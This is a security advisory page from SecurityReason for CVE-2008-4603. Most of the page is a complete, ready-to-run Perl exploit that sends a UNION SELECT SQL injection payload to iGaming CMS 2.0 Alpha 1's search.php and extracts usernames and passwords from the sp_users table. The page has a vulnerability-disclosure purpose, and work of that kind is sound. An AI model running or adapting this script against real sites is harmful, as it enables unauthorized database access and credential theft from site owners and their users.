SecurityReason.com - Our Reason is

Security

Register | Forget Password | Login
SecurityReason
WLB
Services
RSS
Corporate
Note

If you have found a vulnerability, please send to our SecurityAlert Database :
secalert()securityreason()com

Also if you have new ( 0-day ) exploit, please send to our ExploitAlert Archive :
exploit()securityreason()com

Home arrow SecurityAlert Database

Arrow  Topic :

iGaming CMS 2.0 Alpha 1 (search.php) Remote SQL Injection Exploit


Arrow  SecurityAlert : 4433
Arrow  CVE : CVE-2008-4603
Arrow  CWE : CWE-89
Arrow  SecurityRisk : High  Security Risk High  (About)
Arrow  Remote Exploit : Yes
Arrow  Local Exploit : No
Arrow  Victim interaction required : No
Arrow  Exploit Available : Yes
  ExploitAlert :   4937
Arrow  Credit : StAkeR aka athos
Arrow  Published : 21.10.2008

Arrow  Affected Software : igaming:cms:2.0:alpha_1



Arrow  Advisory Content :  

#!/usr/bin/perl
# -----------------------------------------------------
# iGaming CMS 2.0 Alpha 1 Remote SQL Injection Exploit
# By StAkeR aka athos - StAkeR[at]hotmail[dot]it
# On 16/10/2008
# http://www.igamingcms.com/iGaming_2_Alpha.zip
# -----------------------------------------------------

use strict;
use LWP::UserAgent;


my ($host,$id) = @ARGV;

usage() unless $host =~ /http:\/\/(.+?)$/ and $id =~ /^[0-9]/;

my $etc = "' union select 1,concat(0x616E6172636879,".
"password,0x3a,username,0x616E6172636879),3".
",4,5 from sp_users where id=$id#";

my @search = ($etc,'all',0,'Search','search_games');
my @split = undef;

my $http = new LWP::UserAgent;
my $post = $http->post($host.'/search.php',
[
keywords => $search[0],
platform => $search[1],
exact => $search[2],
submit => $search[3],
do => $search[4]
]);

if($post->is_success)
{
if($post->as_string =~ /anarchy(.+?)anarchy/)
{
@split = split(':',$1);

print "Username: $split[0]\r\n";
print "Password: $split[1]\r\n";
}
else
{
print "Exploit Failed!\r\n";
}
}

sub usage
{
print "iGaming CMS 2.0 Alpha 1 Remote SQL Injection Exploit\r\n";
print "Usage: perl $0 http://[host] [user_id]\r\n";
exit;
}



__END__



Arrow  References :

http://securityreason.com/expldownload/1/4937/1 (Exploit)
http://www.securityfocus.com/bid/31793
http://www.milw0rm.com/exploits/6769




Arrow  Feedback :

If you have additional information or notice any errors regarding this security advisory, please use contact form or email us at info()securityreason()com.
Alert

libc:fts_*() Multiple Denial of Service

Security Risk Medium- 2009-10-02

The fts functions are provided for traversing UNIX file hierarchies...

Apache RSS Apache Alert

» Apache 1.3.41 mod_proxy
   Integer overflow (code
   execution)

» Apache Tomcat 6.0.20 and
   5.5.28 unexpected file
   deletion in work
   directory

» Apache Tomcat 6.0.20 and
   5.5.28 insecure partial
   deploy after failed
   undeploy

» Apache Tomcat 6.0.20 and
   5.5.28 unexpected file
   deletion and/or
   alteration

PHP RSS PHP Alert

» PHP 5.2.12/5.3.1
   session.save_path
   safe_mode and
   open_basedir bypass

» PHP 5.2.12/5.3.1 Multiple
   Vulnerabilities

» PHP 5.2.11 libgd multiple
   vulnerabilities

» PHP 5.2.11 tempnam()
   safe_mode bypass

Copyright © SecurityReason.com. All Rights Reserved.